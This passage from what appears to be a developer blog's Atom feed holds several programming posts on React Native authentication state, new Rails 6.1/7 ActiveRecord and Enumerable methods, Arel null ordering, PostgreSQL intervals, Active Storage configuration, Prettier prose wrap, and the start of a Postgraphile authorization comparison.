      <content type="html"><![CDATA[<p>Authentication flow is an essential part of any modern mobile application. In this article, we will see how to store and manage the authentication state in React Native.</p><h2>Storing auth data</h2><p>Let's consider a basic scenario where we use a phone number and authentication token for verifying API requests. Here we need to persist both the phone number and the authentication token. For storing this data we can use AsyncStorage, which is a key-value data store commonly used to persist data locally in React Native. Even though we are storing two different values, we will always access them together, and hence we can avoid multiple AsyncStorage calls by storing them as a single key-value pair.</p><pre><code class="language-javascript">const auth = {
  phone: PHONE_NUMBER, // User's phone number
  token: AUTH_TOKEN, // Authentication token
};

// AsyncStorage supports only string values - so we have to serialize our object.
AsyncStorage.setItem(&quot;auth&quot;, JSON.stringify(auth));</code></pre><p>After storing the data we can use the <code>AsyncStorage.getItem()</code> API to retrieve it.</p><h3>Things to keep in mind while using AsyncStorage</h3><p>It should be clear from the name that AsyncStorage calls are asynchronous, so consider the following while using it.</p><ul><li><p>Avoid unnecessary AsyncStorage calls - async calls take time and may affect user experience.</p></li><li><p>Reuse data once fetched - use higher-level state or central state management like Context, Redux etc. to manage data used in multiple places.</p></li><li><p>Asynchronous calls might fail, so we should handle exceptions properly.</p></li><li><p>On Android, AsyncStorage has a 6MB hard limit. You can change it by setting the <code>AsyncStorage_db_size_in_MB</code> value in the <code>gradle.properties</code> file.</p></li><li><p>AsyncStorage uses SQLite, so beware of <a href="https://www.sqlite.org/limits.html">SQLite limits</a>.</p></li></ul><h2>Manage auth state globally with Context API</h2><p>In many apps we would use the current authentication state to display appropriate content based on auth state, user type etc., so it's always good to put it in a centrally accessible place. We can use a central state management library like Redux or the Context API. In this example we will use the built-in Context API.</p><p>Let's create an AuthContext and store all auth data in the Provider state by fetching it from AsyncStorage. We will also add an API to update the data in state &amp; AsyncStorage.</p><h3>AuthContext</h3><pre><code class="language-javascript">// Create a context
const AuthContext = createContext({});

const AuthProvider = ({ children }) =&gt; {
  const [auth, setAuthState] = useState(initialState);

  // Get current auth state from AsyncStorage
  const getAuthState = async () =&gt; {
    try {
      const authDataString = await AsyncStorage.getItem(&quot;auth&quot;);
      const authData = JSON.parse(authDataString || &quot;{}&quot;);
      // Configure axios headers
      configureAxiosHeaders(authData.token, authData.phone);
      setAuthState(authData);
    } catch (err) {
      setAuthState({});
    }
  };

  // Update AsyncStorage &amp; context state
  const setAuth = async (auth) =&gt; {
    try {
      await AsyncStorage.setItem(&quot;auth&quot;, JSON.stringify(auth));
      // Configure axios headers
      configureAxiosHeaders(auth.token, auth.phone);
      setAuthState(auth);
    } catch (error) {
      return Promise.reject(error);
    }
  };

  useEffect(() =&gt; {
    getAuthState();
  }, []);

  return (
    &lt;AuthContext.Provider value={{ auth, setAuth }}&gt;
      {children}
    &lt;/AuthContext.Provider&gt;
  );
};

export { AuthContext, AuthProvider };</code></pre><p>When using axios we can configure the default auth headers and they will be used for all API requests. In case you are not using axios you can still get the auth values from the context.</p><pre><code class="language-javascript">const configureAxiosHeaders = (token, phone) =&gt; {
  axios.defaults.headers[&quot;X-Auth-Token&quot;] = token;
  axios.defaults.headers[&quot;X-Auth-Phone&quot;] = phone;
};</code></pre><p>Now we can wrap our root component with <code>AuthProvider</code> and use the <code>useContext()</code> API in any component to access the auth state.</p><h2>Restricting routes (screens)</h2><p>Displaying appropriate screens and restricting access to screens based on the auth state is a common use case. In this section, we will see how to display the Login/Signup screens if the user is not authenticated and a Home screen if the user is already authenticated.</p><pre><code class="language-javascript">const App = () =&gt; {
  // Get auth state from context
  const { auth } = useContext(AuthContext);

  return (
    &lt;NavigationContainer&gt;
      &lt;Stack.Navigator&gt;
        {auth.token ? (
          &lt;Stack.Screen name=&quot;Home&quot; component={Home} /&gt;
        ) : (
          &lt;&gt;
            &lt;Stack.Screen name=&quot;Signup&quot; component={Signup} /&gt;
            &lt;Stack.Screen name=&quot;Login&quot; component={Login} /&gt;
          &lt;/&gt;
        )}
      &lt;/Stack.Navigator&gt;
    &lt;/NavigationContainer&gt;
  );
};</code></pre><p>In the above snippet, we are conditionally rendering screens based on the auth token rather than doing manual navigation using the <code>navigate</code> function. This will help us restrict access to screens and avoid accessing restricted screens when navigating from code or using the system back button on Android.</p><h3>Things to keep in mind while using React Navigation</h3><ul><li><p>Try to keep all top-level StackNavigator screens in one place to avoid unexpected behaviour.</p></li><li><p>Use conditional rendering to restrict screens.</p></li><li><p>Use <code>replace</code> instead of <code>navigate</code> when you want to remove the current screen from the back stack.</p></li><li><p>Use constants for screen names instead of string literals.</p></li></ul><h2>Enhancements</h2><ul><li><p>Store additional pieces of information like user type, username etc. in the AuthContext for easier access.</p></li><li><p>Improve AuthContext by using useReducer instead of useState.</p></li><li><p>Consider using state management libraries like Redux if you want to manage lots of state globally.</p></li><li><p>Use a loader state to display a SplashScreen until we fetch the auth state from AsyncStorage for the first time.</p></li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds Enumerable#in_order_of]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-enumerable-in-order-of"/>
      <updated>2021-03-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-enumerable-in-order-of</id>
      <content type="html"><![CDATA[<p>Rails 7 introduces the <code>Enumerable#in_order_of</code> method, by which we can order and constrain any enumerable collection using a key-series pair.</p><pre><code class="language-ruby">=&gt; Item = Struct.new(:price)
=&gt; items = [Item.new(24), Item.new(32), Item.new(16)]
=&gt; items.in_order_of(:price, [16, 32, 24])
=&gt; [#&lt;struct Item price=16&gt;, #&lt;struct Item price=32&gt;, #&lt;struct Item price=24&gt;]</code></pre><p>If any value in the series has no associated records in the enumerable collection, it will be ignored and the rest will be returned in the result.</p><pre><code class="language-ruby">=&gt; items.in_order_of(:price, (15..25))
=&gt; [#&lt;struct Item price=16&gt;, #&lt;struct Item price=24&gt;]</code></pre><p>Similarly, any values not included in the series will be omitted from the final result.</p><pre><code class="language-ruby">=&gt; items.in_order_of(:price, [16, 32])
=&gt; [#&lt;struct Item price=16&gt;, #&lt;struct Item price=32&gt;]</code></pre><p>Check out this <a href="https://github.com/rails/rails/pull/41333">pull request</a> for more details.</p>]]></content>
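The semantics described above (order by the series, drop items whose key is not in the series, skip series values with no matching items) can be sketched in plain Ruby. The helper name `in_order_of_sketch` is hypothetical and this is not the actual Rails implementation:

```ruby
# Hypothetical plain-Ruby sketch of Enumerable#in_order_of semantics.
Item = Struct.new(:price)
items = [Item.new(24), Item.new(32), Item.new(16)]

def in_order_of_sketch(collection, key, series)
  # Group elements by the value of the given key ...
  by_key = collection.group_by { |element| element.public_send(key) }
  # ... then walk the series, skipping values with no matching elements.
  series.flat_map { |value| by_key.fetch(value, []) }
end

in_order_of_sketch(items, :price, [16, 32, 24]).map(&:price) # => [16, 32, 24]
in_order_of_sketch(items, :price, 15..25).map(&:price)       # => [16, 24]
```

Note that walking the series (rather than sorting the collection) is what makes unmatched series values fall out naturally.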
    </entry><entry>
       <title><![CDATA[Rails 7 adds ActiveRecord::Relation#excluding]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-activerecord-relation-excluding"/>
      <updated>2021-03-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-activerecord-relation-excluding</id>
      <content type="html"><![CDATA[<p>We might have used the <a href="https://www.rubydoc.info/docs/rails/Array:excluding">Array#excluding</a> method to return an array after eliminating specific elements which are passed as an argument.</p><pre><code class="language-ruby">=&gt; [&quot;John&quot;, &quot;Sam&quot;, &quot;Oliver&quot;].excluding(&quot;Sam&quot;)
=&gt; [&quot;John&quot;, &quot;Oliver&quot;]</code></pre><p>When it comes to Active Record queries, we usually make use of a <a href="https://edgeguides.rubyonrails.org/active_record_querying.html#not-conditions">NOT condition</a> query to eliminate specific records from the result.</p><pre><code class="language-ruby">=&gt; users = User.where.not(id: current_user.id)
=&gt; &quot;SELECT \&quot;users\&quot;.* FROM \&quot;users\&quot; WHERE \&quot;users\&quot;.\&quot;id\&quot; != 1&quot;</code></pre><p>This is simplified with Rails 7's newly-introduced <code>ActiveRecord::Relation#excluding</code> method.</p><pre><code class="language-ruby">=&gt; users = User.excluding(current_user)
=&gt; &quot;SELECT \&quot;users\&quot;.* FROM \&quot;users\&quot; WHERE \&quot;users\&quot;.\&quot;id\&quot; != 1&quot;

# We can also pass a collection of records as an argument
=&gt; comments = Comment.excluding(current_user.comments)
=&gt; &quot;SELECT \&quot;comments\&quot;.* FROM \&quot;comments\&quot; WHERE \&quot;comments\&quot;.\&quot;id\&quot; NOT IN (1, 2)&quot;</code></pre><p>The <code>excluding</code> method applies to Active Record associations as well.</p><pre><code class="language-ruby">=&gt; comments = current_user.comments.excluding(comment1, comment2)
=&gt; &quot;SELECT \&quot;comments\&quot;.* FROM \&quot;comments\&quot; WHERE \&quot;comments\&quot;.\&quot;user_id\&quot; = 1 AND \&quot;comments\&quot;.\&quot;id\&quot; NOT IN (1, 2)&quot;</code></pre><p>The alias method <code>without</code> can also be used instead of <code>excluding</code>.</p><pre><code class="language-ruby">=&gt; users = User.without(current_user)
=&gt; &quot;SELECT \&quot;users\&quot;.* FROM \&quot;users\&quot; WHERE \&quot;users\&quot;.\&quot;id\&quot; != 1&quot;
=&gt; comments = Comment.without(comment1)
=&gt; &quot;SELECT \&quot;comments\&quot;.* FROM \&quot;comments\&quot; WHERE \&quot;comments\&quot;.\&quot;id\&quot; != 1&quot;</code></pre><p>Check out these pull requests <a href="https://github.com/rails/rails/pull/41439">41439</a> &amp; <a href="https://github.com/rails/rails/pull/41465">41465</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds nulls_first and nulls_last methods to Arel for PostgreSQL]]></title>
       <author><name>Berin Larson</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-nulls-first-and-nulls-last-to-arel"/>
      <updated>2021-03-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-nulls-first-and-nulls-last-to-arel</id>
      <content type="html"><![CDATA[<p>In PostgreSQL, when sorting output rows in descending order, columns with null values will appear first.</p><p>Let's take this example of ordering users by the number of times they have logged in.</p><pre><code class="language-sql">postgres=&gt; SELECT * from users ORDER BY login_count DESC;
       name        | login_count
-------------------+-------------
 Johnny Silverhand |        NULL
 Jackie Welles     |         202
 V                 |           1
(3 rows)</code></pre><p>This is not useful since most of the time we would want the null values to appear last.</p><p>PostgreSQL provides <code>NULLS FIRST</code> and <code>NULLS LAST</code> options for the <code>ORDER BY</code> clause for this use case.</p><pre><code class="language-ruby">irb&gt; pp User.order(&quot;login_count DESC NULLS LAST&quot;).
       pluck(:name, :login_count)
(0.9 ms)  SELECT &quot;users&quot;.&quot;name&quot;, &quot;users&quot;.&quot;login_count&quot; FROM &quot;users&quot;
          ORDER BY login_count DESC NULLS LAST
=&gt; [[&quot;Jackie Welles&quot;, 202],
   [&quot;V&quot;, 1],
   [&quot;Johnny Silverhand&quot;, nil]]</code></pre><p>In Rails 6.1, we can use the new <code>nulls_first</code> or <code>nulls_last</code> methods to construct the same query using Arel.</p><pre><code class="language-ruby">irb&gt; pp User.order(User.arel_table[:login_count].desc.nulls_last).
       pluck(:name, :login_count)
(0.9 ms)  SELECT &quot;users&quot;.&quot;name&quot;, &quot;users&quot;.&quot;login_count&quot; FROM &quot;users&quot;
          ORDER BY login_count DESC NULLS LAST
=&gt; [[&quot;Jackie Welles&quot;, 202],
   [&quot;V&quot;, 1],
   [&quot;Johnny Silverhand&quot;, nil]]</code></pre><p>The resulting code is slightly more verbose for this simple example. But Arel really shines when programmatically constructing complex SQL queries.</p><p>Check out this <a href="https://github.com/rails/rails/pull/38131">pull request</a> for more details.</p>]]></content>
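The NULLS LAST ordering the post describes can also be illustrated with a plain-Ruby, in-memory sort. This is a hypothetical illustration of the semantics only (real code should let the database do this via Arel, as shown above):

```ruby
# Hypothetical plain-Ruby illustration of "DESC NULLS LAST" semantics.
User = Struct.new(:name, :login_count)
users = [
  User.new("Johnny Silverhand", nil),
  User.new("Jackie Welles", 202),
  User.new("V", 1),
]

# Sort descending by login_count while pushing nils to the end:
# the first tuple element sends nils last, the second sorts the rest descending.
sorted = users.sort_by { |u| [u.login_count.nil? ? 1 : 0, -(u.login_count || 0)] }
sorted.map(&:name) # => ["Jackie Welles", "V", "Johnny Silverhand"]
```

The two-element sort key mirrors what the database does: partition on NULL-ness first, then order within each partition.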
    </entry><entry>
       <title><![CDATA[Rails 7.0 adds ActiveRecord::FinderMethods 'sole' and 'find_sole_by']]></title>
       <author><name>Akanksha Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-active-record-finder-methods"/>
      <updated>2021-03-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-active-record-finder-methods</id>
      <content type="html"><![CDATA[<p>&lt;br/&gt;</p><h3>Before Rails 7.0</h3><p>There were no methods defined to find and assert the presence of exactly onerecord at the same time.</p><p>For example, we have a class Product with a <code>price</code> field and we want to find asingle product that has a price of 100. For zero or multiple products with theprice of 100, we want to raise an error. We can not add database constraints tomake a unique field of <code>price</code>.</p><p>Now to solve the above query, we don't have any method defined in<code>ActiveRecord::FinderMethods</code> module. We can find a product with the given priceor raise an error if no record is found using the queries mentioned in the belowexample.</p><pre><code class="language-ruby">Product.find_by!(price: price)#=&gt; ActiveRecord::RecordNotFound Exception     (if no Product with the given price)#=&gt; #&lt;Product ...&gt;                             (first product with the given price)Product.where(price: price).first!#=&gt; ActiveRecord::RecordNotFound Exception     (if no Product with the given price)#=&gt; #&lt;Product ...&gt;                             (first product with the given price)</code></pre><p>We can only use database constraints to make a field unique and if addingconstraints is impractical then we would have to define our own method.</p><p>For example:</p><pre><code class="language-ruby">def self.find_first!(arg, *args)  products = where(arg, *args)  case  when products.empty?    raise_record_not_found_exception!  
when products.count &gt; 0    raise 'More than one record present'  else    products.first  endendProduct.find_first!(price: price)#=&gt; ActiveRecord::RecordNotFound Exception     (if no Product with the given price)#=&gt; #&lt;Product ...&gt;                             (if one Product with the given price)#=&gt; ActiveRecord::SoleRecordExceeded Exception (if more than one Product with the given price)</code></pre><h3>After Rails 7.0</h3><p>Rails 7.0 has added <code>#sole</code> and <code>#find_sole_by</code> methods in theActiveRecord::FinderMethods module. These methods are used to find and assertthe presence of exactly one record.</p><p>When a user wants to find a single row, but also wants to assert that therearen't any other rows matching the condition (especially for when the databaseconstraints aren't enough or are impractical), then these methods come into use.</p><p>For example:</p><pre><code class="language-ruby">class Product    validates :price, presence: trueendProduct.where([&quot;price = %?&quot;, price]).sole#=&gt; ActiveRecord::RecordNotFound Exception     (if no Product with the given price)#=&gt; #&lt;Product ...&gt;                             (if one Product with the given price)#=&gt; ActiveRecord::SoleRecordExceeded Exception (if more than one Product with the given price)Product.find_sole_by(price: price)#=&gt; ActiveRecord::RecordNotFound Exception     (if no Product with the given price)#=&gt; #&lt;Product ...&gt;                             (if one Product with the given price)#=&gt; ActiveRecord::SoleRecordExceeded Exception (if more than one Product with the given price)</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/40768">pull request</a> for moredetails.</p>]]></content>
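The three-way assertion that <code>sole</code> makes can be sketched in plain Ruby over an in-memory array. The exception classes below are stand-ins for the Rails ones, and `sole_sketch` is a hypothetical helper, not the Rails implementation:

```ruby
# Hypothetical plain-Ruby sketch of the #sole assertion over an array.
class RecordNotFound < StandardError; end
class SoleRecordExceeded < StandardError; end

def sole_sketch(records)
  raise RecordNotFound if records.empty?        # zero matches -> not found
  raise SoleRecordExceeded if records.size > 1  # more than one match -> error
  records.first                                 # exactly one match -> return it
end

sole_sketch([:product]) # => :product
```

The point of the method is that both failure modes raise, so callers can rely on the return value being the one and only match.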
    </entry><entry>
       <title><![CDATA[Rails 7 adds Enumerable#maximum]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-enumerable-maximum"/>
      <updated>2021-02-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-enumerable-maximum</id>
      <content type="html"><![CDATA[<p>Rails 7 adds support for <code>Enumerable#maximum</code> and <code>Enumerable#minimum</code> to easily calculate the maximum and minimum value from a collection of enumerable elements.</p><p>Before Rails 7, we could only achieve the same results with a combination of <code>map</code> &amp; <code>max</code> or <code>min</code> functions over the enumerable collection.</p><pre><code class="language-ruby">=&gt; Item = Struct.new(:price)
=&gt; items = [Item.new(12), Item.new(8), Item.new(24)]
=&gt; items.map { |x| x.price }.max
=&gt; 24
=&gt; items.map { |x| x.price }.min
=&gt; 8</code></pre><p>This is simplified with Rails 7's newly-introduced <code>maximum</code> and <code>minimum</code> methods.</p><pre><code class="language-ruby">=&gt; items.maximum(:price)
=&gt; 24
=&gt; items.minimum(:price)
=&gt; 8</code></pre><p>These methods are available through Action Controller's <a href="https://api.rubyonrails.org/v6.1.0/classes/ActionController/ConditionalGet.html#method-i-fresh_when">fresh_when</a> and <a href="https://api.rubyonrails.org/v6.1.0/classes/ActionController/ConditionalGet.html#method-i-stale-3F">stale?</a> for convenience.</p><pre><code class="language-ruby"># Before Rails 7
def index
  @items = Item.limit(20).to_a
  fresh_when @items, last_modified: @items.pluck(:updated_at).max
end

# After Rails 7
def index
  @items = Item.limit(20).to_a
  fresh_when(@items)
end</code></pre><p>The <code>etag</code> or <code>last_modified</code> header values will be properly set here based on the maximum value of the <code>updated_at</code> field.</p><p>Check out this <a href="https://github.com/rails/rails/pull/41404">pull request</a> for more details.</p>]]></content>
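The `map`-then-`max`/`min` pattern from the post generalizes to any attribute via `public_send`, which is essentially what a key-based maximum/minimum has to do. A hypothetical plain-Ruby sketch (the helper names are made up, and this is not the Rails implementation):

```ruby
# Hypothetical plain-Ruby sketch of Enumerable#maximum / #minimum semantics.
Item = Struct.new(:price)
items = [Item.new(12), Item.new(8), Item.new(24)]

def maximum_sketch(collection, key)
  # Extract the given attribute from each element, then take the largest.
  collection.map { |element| element.public_send(key) }.max
end

def minimum_sketch(collection, key)
  collection.map { |element| element.public_send(key) }.min
end

maximum_sketch(items, :price) # => 24
minimum_sketch(items, :price) # => 8
```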
    </entry><entry>
       <title><![CDATA[Prettier's Prose Wrap and eslint maximum-line-length error]]></title>
       <author><name>Mazahir B Haroon</name></author>
      <link href="https://www.bigbinary.com/blog/prettier-prose-wrap-option"/>
      <updated>2021-02-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/prettier-prose-wrap-option</id>
      <content type="html"><![CDATA[<p>If you go through Prettier's Prose Wrap documentation, you can see that it provides 3 options:</p><ul><li><code>&quot;always&quot;</code> - Wrap prose if it exceeds the print width.</li><li><code>&quot;never&quot;</code> - Do not wrap prose.</li><li><code>&quot;preserve&quot;</code> - Wrap prose as-is. (First available in v1.9.0)</li></ul><p>Now, this does not exactly give a clear idea of what each option does, and it could be a little confusing, especially between the <code>&quot;never&quot;</code> and <code>&quot;preserve&quot;</code> options.</p><p>The below video walks you through these options and tries to give you a clear idea of Prettier's Prose Wrap and its use-case.</p><p>&lt;div class=&quot;youtube-video-container&quot;&gt;&lt;iframe width=&quot;560&quot; height=&quot;315&quot; src=&quot;https://www.youtube.com/embed/2LN3JfopqTY&quot; frameborder=&quot;0&quot; allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot; allowfullscreen&gt;&lt;/iframe&gt;&lt;/div&gt;</p><h2>Links to the pages mentioned in the above video</h2><ul><li><a href="https://prettier.io/docs/en/options.html#prose-wrap">Prose Wrap Documentation</a></li><li><a href="https://prettier.io/docs/en/option-philosophy.html">Prettier's Philosophy</a></li><li><a href="https://prettier.io/playground/">Prettier's Playground</a></li><li><a href="https://github.com/isaacs/github/issues/1013">GitHub comments not compliant with GFM soft line breaks?</a></li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds support for PostgreSQL interval data type]]></title>
       <author><name>Akhil Gautam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-postgresql-interval-data-type"/>
      <updated>2021-01-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-postgresql-interval-data-type</id>
      <content type="html"><![CDATA[<p>&lt;br /&gt;</p><h3>What is PostgreSQL Interval Data Type?</h3><p>PostgreSQL Interval Data Type allows us to store a duration/period of time inyears, months, days, hours, minutes, seconds, etc. It also allows us to performarithmetic operations on that interval.</p><p>There are two input formats for interval data. These formats are used to writeinterval values.</p><ol><li>Verbose format:</li></ol><pre><code class="language-ruby">  &lt;quantity&gt; &lt;unit&gt; [&lt;quantity&gt; &lt;unit&gt;...] [&lt;direction&gt;]  # Examples:  '2 years ago'  '12 hours 13 minutes ago'  '8 years 7 months 2 days 3 hours'</code></pre><ul><li><code>quantity</code> can be any number.</li><li><code>unit</code> can be any granular unit of time in plural or singular form likedays/day, months/month, weeks/week, etc..</li><li><code>direction</code> can be <code>ago</code> or an empty string.</li></ul><ol start="2"><li>ISO 8601 formats:</li></ol><pre><code class="language-ruby">P &lt;quantity&gt; &lt;unit&gt; [ &lt;quantity&gt; &lt;unit&gt; ...] 
[ T [ &lt;quantity&gt; &lt;unit&gt; ...]]</code></pre><ul><li>ISO 8601 format always starts with <code>P</code>.</li><li><code>quantity</code> and <code>unit</code> before <code>T</code> represents years, months, weeks and days ofan interval.</li><li><code>quantity</code> and <code>unit</code> after <code>T</code> represents the time-of-day unit.</li></ul><pre><code class="language-ruby"># ExamplesP1Y1M1D =&gt; interval of '1 year 1 month 1 day'P3Y1DT2H =&gt; interval of '3 years 1 day 2 hours'P5Y2MT3H2M =&gt; interval of '5 years 2 months 3 hours 2 minutes'# NOTE: If `M` appears before `T`,# it is month/months and if it appears after `T`, it signifies minute/minutes.ORP [ years-months-days ] [ T hours:minutes:seconds ]# ExamplesP0012-07-00T00:09:00 =&gt; interval of '12 years 7 months 9 minutes'P0000-10-00T10:00:00 =&gt; interval of '10 months 10 hours'</code></pre><h4>Arithmetic operations on interval</h4><p>We can easily apply addition, subtraction and multiplication operations oninterval data.</p><pre><code class="language-ruby">'10 hours 10 minutes' + '30 minutes' =&gt; '10 hours 40 minutes''10 hours 10 minutes' - '10 minutes' =&gt; '10 hours'60 * '10 minute' =&gt; '10 hours'</code></pre><h3>Before Rails 6.1</h3><p>PostgreSQL <code>interval</code> data type can be used in Rails but Active Record treats<code>interval</code> as a string. In order to convert it to an <code>ActiveSupport::Duration</code>object, we have to manually alter the <code>IntervalStyle</code> of the database to<code>iso_8601</code> and then parse it as shown below:</p><pre><code class="language-ruby">execute &quot;ALTER DATABASE &lt;our_database_name&gt; SET IntervalStyle = 'iso_8601'&quot;ActiveSupport::Duration.parse(the_iso_8601_formatted_string)</code></pre><h3>Rails 6.1</h3><p>Rails 6.1 adds built-in support for the PostgreSQL <code>interval</code> data type. Itautomatically converts <code>interval</code> to an <code>ActiveSupport::Duration</code> object whenfetched from a database. 
When a record containing the <code>interval</code> field is saved,it is serialized to an ISO 8601 formatted duration string.</p><p>The following example illustrates how it can be used now:</p><pre><code class="language-ruby"># db/migrate/20201109111850_create_seminars.rbclass CreateSeminars &lt; ActiveRecord::Migration[6.1]  def change    create_table :seminars do |t|      t.string :name      t.interval :duration      t.timestamps    end  endend# app/models/seminar.rbclass Seminar &lt; ApplicationRecord  attribute :duration, :intervalend&gt;&gt; seminar = Seminar.create!(name: 'RubyConf', duration: 5.days)&gt;&gt; seminar=&gt; #&lt;Event id: 1, name: &quot;RubyConf&quot;, duration: 5 days, created_at: ...&gt;&gt;&gt; seminar.duration=&gt; 5 days&gt;&gt; seminar.duration.class=&gt; ActiveSupport::Duration&gt;&gt; seminar.duration.iso8601=&gt; &quot;P5D&quot;# ISO 8601 strings can also be provided as interval's value&gt;&gt; seminar = Seminar.create!(name: 'GopherConIndia', duration: 'P5DT7H6S')&gt;&gt; seminar=&gt; #&lt;Event id: 2, name: &quot;GopherConIndia&quot;, duration: 5 days, 7 hours, and 6 seconds, created_at: ...&gt;# Invalid values to interval are written as NULL in the database.&gt;&gt; seminar = Seminar.create!(name: 'JSConf', duration: '3 days')&gt;&gt; seminar=&gt; #&lt;Event id: 3, name: &quot;JSConf&quot;, duration: nil, created_at: ...&gt;</code></pre><p>If we want to keep the old behaviour where <code>interval</code> is treated as a string, weneed to add the following in the model.</p><pre><code class="language-ruby"># app/models/seminar.rbclass Seminar &lt; ApplicationRecord  attribute :duration, :stringend</code></pre><p>If the <code>attribute</code> is not set in the model, it will throw the followingdeprecation warning.</p><pre><code class="language-plaintext">DEPRECATION WARNING: The behavior of the `:interval` type will be changing in Rails 6.2to return an `ActiveSupport::Duration` object. 
If you'd like to keep the old behavior, you can add this line to the Seminar model:

  attribute :duration, :string

If you'd like the new behavior today, you can add this line:

  attribute :duration, :interval</code></pre><p>Check out the <a href="https://github.com/rails/rails/commit/0475215d4fa1a6db2a92a0065081fe19c64cc124">commit</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 allows per environment configuration support for Active Storage]]></title>
       <author><name>Shashank</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-allows-per-environment-configuration-support-for-active-storage"/>
      <updated>2021-01-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-allows-per-environment-configuration-support-for-active-storage</id>
      <content type="html"><![CDATA[<p>Rails 6.1 allows environment-specific configuration files to set up Active Storage.</p><p>In development, the <code>config/storage/development.yml</code> file will take precedence over the <code>config/storage.yml</code> file. Similarly, in production, the <code>config/storage/production.yml</code> file will take precedence.</p><p>If an environment-specific configuration is not present, Rails will fall back to the configuration declared in <code>config/storage.yml</code>.</p><h2>Why was it needed?</h2><p>Before Rails 6.1, all storage services were defined in one file; each environment could set its preferred service in <code>config.active_storage.service</code>, and that service would be used for all attachments.</p><p>Now we can override the default application-wide storage service for any attachment, like this:</p><pre><code class="language-ruby">class User &lt; ApplicationRecord
  has_one_attached :avatar, service: :amazon_s3
end</code></pre><p>And we can declare a custom <code>amazon_s3</code> service in the <code>config/storage.yml</code> file:</p><pre><code class="language-yaml">amazon_s3:
  service: S3
  bucket: &quot;...&quot;
  access_key_id: &quot;...&quot;
  secret_access_key: &quot;...&quot;</code></pre><p>But we are still using the same service for storing avatars in both production and development environments.</p><p>To use a separate service per environment, Rails allows the creation of configuration files for each.</p><h2>How do we do that?</h2><p>Let's change the service to something more generic in the User model:</p><pre><code class="language-ruby">class User &lt; ApplicationRecord
  has_one_attached :avatar, service: :store_avatars
end</code></pre><p>And add some environment configurations:</p><p>For production we'll add <code>config/storage/production.yml</code>:</p><pre><code class="language-yaml">store_avatars:
  service: S3
  bucket: &quot;...&quot;
  access_key_id: &quot;...&quot;
  secret_access_key: &quot;...&quot;</code></pre><p>And for development we'll add <code>config/storage/development.yml</code>:</p><pre><code class="language-yaml">store_avatars:
  service: Disk
  root: &lt;%= Rails.root.join(&quot;storage&quot;) %&gt;</code></pre><p>This will ensure that Rails stores the avatars differently per environment.</p><p>Check out the <a href="https://github.com/rails/rails/pull/40294">pull request</a> to learn more.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Authorization in REST vs Postgraphile]]></title>
       <author><name>Amal Jose</name></author>
      <link href="https://www.bigbinary.com/blog/authorization-in-rest-vs-postgraphile"/>
      <updated>2021-01-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/authorization-in-rest-vs-postgraphile</id>
      <content type="html"><![CDATA[<p><a href="https://www.graphile.org/postgraphile/">Postgraphile</a> is a great tool for making an instant GraphQL API from a PostgreSQL database. When I started working with Postgraphile, its authorization part felt a bit different compared to the REST-based backends I had worked with before. Here I will share some differences that I noted.</p><p>First, let's see <strong>Authentication</strong> vs <strong>Authorization</strong>.</p><p><strong>Authentication</strong> is determining whether a user is logged in or not. <strong>Authorization</strong> is then deciding what the user has permission to do or see.</p><h2>Comparing the implementation of a blog application using Postgraphile vs REST</h2><p>Suppose we have to build a blog application with the below schema.</p><p><img src="/blog_images/2021/authorization-in-rest-vs-postgraphile/blog-application.png" alt="blog application schema"></p><h6>Features of the blog application</h6><ul><li><p>Display <strong>published</strong> blogs with <strong>is_published = true</strong> to all users.</p></li><li><p>Display <strong>unpublished</strong> blogs with <strong>is_published = false</strong> to their creator only.</p></li></ul><h2>REST Implementation</h2><p>The REST implementation with JavaScript and <a href="https://sequelize.org/master/manual/model-querying-basics.html">sequelize</a> can look like the one below.</p><p><img src="/blog_images/2021/authorization-in-rest-vs-postgraphile/rest-implementation.jpeg" alt="REST implementation"></p><p>The <strong>client</strong> requests the blogs using an endpoint; it also attaches the access token received from the authentication service.</p><pre><code class="language-js">const getBlogs = () =&gt;
  requestData({
    endpoint: `/api/blogs`,
    accessToken: &quot;***&quot;,
  });</code></pre><p>The backend code in the <strong>server</strong> receives the request, finds the currently logged-in user from the access token, and requests the data based on the currently logged-in user 
from the database.</p><pre><code class="language-js">const userEmail = findEmail(accessToken);

const blogs = await models.Blogs.findAll({
  where: { [Op.or]: [{ creatorEmail: userEmail }, { isPublished: true }] },
});

res.send(blogs);</code></pre><p>Here, the backend code finds the user's email from the access token, then asks the database for the list of blogs that have <code>creatorEmail</code> matching the current user's email or the field <code>isPublished</code> set to true.</p><p>The <strong>database</strong> will return whatever data the server requests.</p><p>Similarly, for creating, editing, and deleting blogs, we can have different endpoints to handle the authorization logic in the backend code.</p><h2>Postgraphile Implementation</h2><p>The Postgraphile implementation can look like the one below.</p><p><img src="/blog_images/2021/authorization-in-rest-vs-postgraphile/postgraphile-implementation.jpeg" alt="postgraphile implementation"></p><p>The <strong>client</strong> requests the blogs using a GraphQL query. It also attaches the access token received from the authentication service.</p><pre><code class="language-js">const data = requestQuery({
  query: `allBlogs {
